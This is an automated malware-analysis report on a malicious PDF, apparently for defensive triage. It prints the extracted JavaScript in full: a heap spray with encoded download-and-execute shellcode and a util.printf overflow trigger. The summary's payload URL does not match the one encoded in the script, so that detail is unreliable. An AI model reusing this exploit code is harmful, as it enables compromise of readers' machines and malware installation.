PDF malware analysis — malicious · ae9e45e72912ab35

MALICIOUS

PDF

1.8 KB First seen: 2012-10-23

MD5: 405932cc6077436b810119f55e6ee56a SHA-1: 6396001f399e024459e118c6446099e942ab76a9 SHA-256: ae9e45e72912ab3547c04e3f240e7cd98a9aed64dd8c0210178f64f11551b9a1

74 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains obfuscated JavaScript that utilizes ASCIIHexDecode and ASCII85Decode filters, indicative of exploit code. The script attempts to download a second-stage payload from the URL 'http://192.168.1.100/glamarsl/glamarsl.exe?p=520-992-9932'. The ML classifier strongly flags this PDF as malicious, supporting the conclusion that it is designed for exploitation and payload delivery.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX

Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
ASCII85Decode filter (with exploit indicators) low PDF_FILTER_85

ASCII85 encoding filter present alongside exploit delivery indicators — uncommon outside of obfuscation

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0006_000.js pdf-javascript-stream PDF /JS object 6 at offset 0x138 1406 bytes

Filename	Kind	Source	Size
`javascript_obj0006_000.js`	pdf-javascript-stream	PDF /JS object 6 at offset 0x138	1406 bytes
SHA-256: `727c286bb6324f0956093b5cea394245b4a0ce861f9aad7ffe4e4f15b14d322d`
Preview script First 1,000 lines of the extracted script var code = '\u72EB\u3160\u64C9\u718B\u8B30\u0C76\u768B\u8B1C\u085E\u568B\u8B20\u6636\u4A39\u7518\u89F2\u245C\u611C\u60C3\u6C8B\u2424\u458B\u8B3C\u0554\u0178\u8BEA\u184A\u5A8B\u0120\uE3EB\u4937\u348B\u018B\u31EE\u31FF\uFCC0\u84AC\u74C0\uC10A\u0DCF\uC701\uF1E9\uFFFF\u3BFF\u247C\u7528\u8BDE\u245A\uEB01\u8B66\u4B0C\u5A8B\u011C\u8BEB\u8B04\uE801\u4489\u1C24\uC361\u6DEB\uB95F\uFFFF\uFFFF\uFE89\uFFB0\uAEF2\u47FE\u89FF\uB0FB\uF2FF\uFEAE\uFF47\uFD89\uAEF2\u47FE\uE8FF\uFF68\uFFFF\u8EBA\u0E4E\u52EC\uE850\uFF7D\uFFFF\uFF56\uBAD0\u1A36\u702F\u5052\u6EE8\uFFFF\u31FF\u52D2\u5352\u5255\uD0FF\u3FE8\uFFFF\uBAFF\uFE98\u0E8A\u5052\u54E8\uFFFF\u31FF\u81D2\uFFC2\uFFFF\u81FF\uFAEA\uFFFF\u52FF\uFF53\uEBD0\uEB02\uE816\uFF18\uFFFF\u7EBA\uE2D8\u5273\uE850\uFF2D\uFFFF\uD231\uFF52\uE8D0\uFF76\uFFFF\u7275\u6D6C\u6E6F\u642E\u6C6C\u75FF\u2E70\u7865\uFF65\u7468\u7074\u2F3A\u622F\u6C61\u6F6D\u6172\u736C\u7265\u6976\u6563\u2E73\u726F\u2F67\u654C\u4976\u4761\u726F\u2F65\u662F\u6C69\u2E65\u6870\u3F70\u3D65\u6441\u626F\u2D65\u3032\u3830\u322D\u3939\uFF32';var nops = '\u4b4f\u4027';var a = '';for (b = 128; b >= 0; --b) a += nops;c = a + code;d = nops;e = 20;f = e + c.length;while (d.length < f) d += d;g = d.substring(0, f);h = d.substring(0, d.length - f);while(h.length + f < 0x40000) h = h + h + g;i = new Array();for (j = 0; j < 1450; j++) i[j] = h + c;var z = 0;var ff = '45000';util.printf('%' + ff + '.' + ff + 'f', z);

SHA-256: 727c286bb6324f0956093b5cea394245b4a0ce861f9aad7ffe4e4f15b14d322d

Preview script

First 1,000 lines of the extracted script

var code = '\u72EB\u3160\u64C9\u718B\u8B30\u0C76\u768B\u8B1C\u085E\u568B\u8B20\u6636\u4A39\u7518\u89F2\u245C\u611C\u60C3\u6C8B\u2424\u458B\u8B3C\u0554\u0178\u8BEA\u184A\u5A8B\u0120\uE3EB\u4937\u348B\u018B\u31EE\u31FF\uFCC0\u84AC\u74C0\uC10A\u0DCF\uC701\uF1E9\uFFFF\u3BFF\u247C\u7528\u8BDE\u245A\uEB01\u8B66\u4B0C\u5A8B\u011C\u8BEB\u8B04\uE801\u4489\u1C24\uC361\u6DEB\uB95F\uFFFF\uFFFF\uFE89\uFFB0\uAEF2\u47FE\u89FF\uB0FB\uF2FF\uFEAE\uFF47\uFD89\uAEF2\u47FE\uE8FF\uFF68\uFFFF\u8EBA\u0E4E\u52EC\uE850\uFF7D\uFFFF\uFF56\uBAD0\u1A36\u702F\u5052\u6EE8\uFFFF\u31FF\u52D2\u5352\u5255\uD0FF\u3FE8\uFFFF\uBAFF\uFE98\u0E8A\u5052\u54E8\uFFFF\u31FF\u81D2\uFFC2\uFFFF\u81FF\uFAEA\uFFFF\u52FF\uFF53\uEBD0\uEB02\uE816\uFF18\uFFFF\u7EBA\uE2D8\u5273\uE850\uFF2D\uFFFF\uD231\uFF52\uE8D0\uFF76\uFFFF\u7275\u6D6C\u6E6F\u642E\u6C6C\u75FF\u2E70\u7865\uFF65\u7468\u7074\u2F3A\u622F\u6C61\u6F6D\u6172\u736C\u7265\u6976\u6563\u2E73\u726F\u2F67\u654C\u4976\u4761\u726F\u2F65\u662F\u6C69\u2E65\u6870\u3F70\u3D65\u6441\u626F\u2D65\u3032\u3830\u322D\u3939\uFF32';var nops = '\u4b4f\u4027';var a = '';for (b = 128; b >= 0; --b) a += nops;c = a + code;d = nops;e = 20;f = e + c.length;while (d.length < f) d += d;g = d.substring(0, f);h = d.substring(0, d.length - f);while(h.length + f < 0x40000) h = h + h + g;i = new Array();for (j = 0; j < 1450; j++) i[j] = h + c;var z = 0;var ff = '45000';util.printf('%' + ff + '.' + ff + 'f', z);

Open this report in the interactive analyzer, or submit your own file for analysis.